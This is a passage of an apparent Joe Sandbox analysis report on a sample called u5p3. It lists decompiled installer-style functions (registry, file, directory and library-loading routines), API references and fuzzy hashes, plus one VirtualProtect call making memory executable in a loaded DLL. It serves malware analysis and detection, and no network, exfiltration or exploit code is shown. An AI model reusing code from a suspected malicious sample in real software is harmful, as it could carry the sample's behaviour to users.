                                                        0x1000280d
                                                        0x10002815

                                                        APIs
                                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.841534468.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.841525683.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841545533.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.841553679.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: `gqt@Mqt
                                                        • API String ID: 544645111-3052285678
                                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                        • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                        • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040247E Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E0040247E(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402C77(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402C37(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x4c) = 0x800;
					if(RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00406193(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t37 - 4);
				return 0;
			}








                                                        0x0040247e
                                                        0x0040247e
                                                        0x00402483
                                                        0x0040248a
                                                        0x0040248c
                                                        0x00402493
                                                        0x00402496
                                                        0x00402885
                                                        0x0040249c
                                                        0x0040249f
                                                        0x004024ba
                                                        0x004024ea
                                                        0x004024ea
                                                        0x004024ed
                                                        0x004024bc
                                                        0x004024c0
                                                        0x004024d9
                                                        0x004024e0
                                                        0x004024e3
                                                        0x004024c2
                                                        0x004024c5
                                                        0x004024d0
                                                        0x00402549
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004024c5
                                                        0x004024c0
                                                        0x00402550
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024AF
                                                        • RegCloseKey.KERNELBASE(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CloseQueryValue
                                                        • String ID:
                                                        • API String ID: 3356406503-0
                                                        • Opcode ID: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                        • Instruction ID: 1ba1cbfe7526e94493429aa356f7c232dcc3bab2ce10746d05ed9864f28b52f9
                                                        • Opcode Fuzzy Hash: 21d2e53ba5899b2399da8d375d2a26f7ebc178e4581a72889eecadc7fe3daa70
                                                        • Instruction Fuzzy Hash: C2119131900209EFEB24DFA4CA585AEB6B4EF04344F20843FE046A62C0D6B84A45DB5A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a250;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x4291ec =  *0x4291ec + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x4291ec, 0x7530,  *0x4291d4), 0); // executed
					}
				}
				return 0;
			}











                                                        0x0040138a
                                                        0x004013fa
                                                        0x0040139b
                                                        0x004013a0
                                                        0x00000000
                                                        0x00000000
                                                        0x004013a2
                                                        0x004013a3
                                                        0x004013ad
                                                        0x00000000
                                                        0x00401404
                                                        0x004013b0
                                                        0x004013b7
                                                        0x004013bd
                                                        0x004013be
                                                        0x004013c0
                                                        0x004013c2
                                                        0x004013b9
                                                        0x004013b9
                                                        0x004013ba
                                                        0x004013ba
                                                        0x004013c9
                                                        0x004013cb
                                                        0x004013f4
                                                        0x004013f4
                                                        0x004013c9
                                                        0x00000000

                                                        APIs
                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                        • Instruction ID: 643084589b99c3aa520b22feaac895240b719bdb66a029b0c5212504e21fbf59
                                                        • Opcode Fuzzy Hash: 4f6c34c5b8a695bbd53b5e5fd0d5779018604e626f19c7de5a7ff9245b1439a4
                                                        • Instruction Fuzzy Hash: 7A01F4317242119BEB195B799D09B3A3798E710314F14463FF855F62F1DA78CC529B4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402388(void* __ebx) {
				void* _t10;
				void* _t14;
				long _t18;
				intOrPtr _t20;
				void* _t22;
				void* _t23;

				_t14 = __ebx;
				_t26 =  *(_t23 - 0x18) - __ebx;
				_t20 =  *((intOrPtr*)(_t23 - 0x24));
				if( *(_t23 - 0x18) != __ebx) {
					_t18 = E00402CF5(__eflags, _t20, E00402C37(0x22),  *(_t23 - 0x18) >> 1);
					goto L4;
				} else {
					_t10 = E00402C77(_t26, 2); // executed
					_t22 = _t10;
					if(_t22 == __ebx) {
						L6:
						 *((intOrPtr*)(_t23 - 4)) = 1;
					} else {
						_t18 = RegDeleteValueW(_t22, E00402C37(0x33));
						RegCloseKey(_t22);
						L4:
						if(_t18 != _t14) {
							goto L6;
						}
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t23 - 4));
				return 0;
			}









                                                        0x00402388
                                                        0x00402388
                                                        0x0040238b
                                                        0x0040238e
                                                        0x004023cf
                                                        0x00000000
                                                        0x00402390
                                                        0x00402392
                                                        0x00402397
                                                        0x0040239b
                                                        0x00402885
                                                        0x00402885
                                                        0x004023a1
                                                        0x004023b1
                                                        0x004023b3
                                                        0x004023d1
                                                        0x004023d3
                                                        0x00000000
                                                        0x004023d9
                                                        0x004023d3
                                                        0x0040239b
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CloseDeleteValue
                                                        • String ID:
                                                        • API String ID: 2831762973-0
                                                        • Opcode ID: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                        • Instruction ID: 69a0439a92fed2963c94793673695853850156b7000f6b5095c498e1c7bb27ff
                                                        • Opcode Fuzzy Hash: 859a452b567a2b49685365d2305dd34cf94649ed3485424598dfda958428dee9
                                                        • Instruction Fuzzy Hash: EDF06832A041149BE711ABA49B4DABEB2A59B44354F15053FFA02F71C1D9FC4D41866D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShow
                                                        • String ID:
                                                        • API String ID: 1136574915-0
                                                        • Opcode ID: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                        • Instruction ID: 9292e16701e7cd97f929a58a5ab9d779cc9b33b2a3d424137dc092703ffa0750
                                                        • Opcode Fuzzy Hash: d0d8b59ecb73009d1eee21f5c2343fbec77fc229469ffa234c84efe8ad4dd57b
                                                        • Instruction Fuzzy Hash: 52E09232E08200CFD7249BA5AA4946D77B4EB84354720407FE112F11D2DA7848418F69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406626 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00406626(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a3e0);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E004065B6(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                        0x0040662e
                                                        0x00406631
                                                        0x00406638
                                                        0x00406640
                                                        0x0040664c
                                                        0x00000000
                                                        0x00406653
                                                        0x00406643
                                                        0x0040664a
                                                        0x00000000
                                                        0x0040665b
                                                        0x00000000

                                                        APIs
                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                          • Part of subcall function 004065B6: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004065CD
                                                          • Part of subcall function 004065B6: wsprintfW.USER32 ref: 00406608
                                                          • Part of subcall function 004065B6: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                        • String ID:
                                                        • API String ID: 2547128583-0
                                                        • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                        • Instruction ID: 40ec7d190cb489a8bb7bfdeabdf724fb2ab18eb81f375fb852db001ef300dc43
                                                        • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                        • Instruction Fuzzy Hash: 06E0863250421166D211A6705E4487763AD9E95650707883FF956F2181D7399C31A66E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D3E Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E00405D3E(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                        0x00405d42
                                                        0x00405d4f
                                                        0x00405d64
                                                        0x00405d6a

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(00438800,00402F01,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCreate
                                                        • String ID:
                                                        • API String ID: 415043291-0
                                                        • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                        • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                        • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                        • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D19 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405D19(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                        0x00405d1e
                                                        0x00405d24
                                                        0x00405d29
                                                        0x00405d32
                                                        0x00405d32
                                                        0x00405d3b

                                                        APIs
                                                        • GetFileAttributesW.KERNELBASE(?,?,0040591E,?,?,00000000,00405AF4,?,?,?,?), ref: 00405D1E
                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D32
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                        • Instruction ID: 51a2066edc4c2a81eeb0428f2148d4bf8de4f40e885bab3ef7b7d11008f75862
                                                        • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                        • Instruction Fuzzy Hash: 72D0C972505420ABC2512728AF0C89BBB95DB542717028B35FAA9A22B0CB304C569A98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004057FC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004057FC(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                        0x00405802
                                                        0x0040580a
                                                        0x00000000
                                                        0x00405810
                                                        0x00000000

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00403330,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7476FAA0,00403589,?,00000006,00000008,0000000A), ref: 00405802
                                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405810
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.840698964.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.840692098.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840709205.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840720490.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.840784743.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_u5p3.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectoryErrorLast
                                                        • String ID:
                                                        • API String ID: 1375471231-0
                                                        • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                        • Instruction ID: ef554e49865ddd63361da1c12a2af0f36bd739cc66983d197ffc2c9f8e40d56f
                                                        • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                        • Instruction Fuzzy Hash: 69C04C71225501DBDB507F219F09B177A54AFA0741F15C83AA586E10E0DA748465DB2D
